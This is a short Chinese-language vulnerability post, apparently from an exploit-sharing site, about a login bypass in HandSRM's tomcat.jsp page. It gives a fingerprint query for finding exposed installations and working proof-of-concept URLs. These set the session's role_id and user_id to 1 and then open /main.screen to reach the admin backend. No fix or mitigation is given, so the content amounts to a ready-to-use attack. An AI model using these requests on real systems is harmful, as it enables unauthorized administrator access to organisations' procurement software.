HandSRM tomcat.jsp 登陆绕过漏洞
# HandSRM tomcat.jsp 登陆绕过漏洞
## 漏洞描述
HandSRM tomcat.jsp 文件存在登陆绕过漏洞, 攻击者通过发送请求包,可以获取后台管理员权限
## 漏洞影响
HandSRM
## 网络测绘...
HandSRM tomcat.jsp 登陆绕过漏洞
漏洞描述
HandSRM tomcat.jsp 文件存在登陆绕过漏洞, 攻击者通过发送请求包,可以获取后台管理员权限
漏洞影响
HandSRM
网络测绘
web.body="HandSRM"
漏洞复现
登陆页面
验证POC (Tomcat session操控)
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
访问跳转后台
/main.screen
- 发表于 2024-07-12 18:46:05
- 阅读 ( 2026 )
- 分类:Web应用
带头大哥
456 篇文章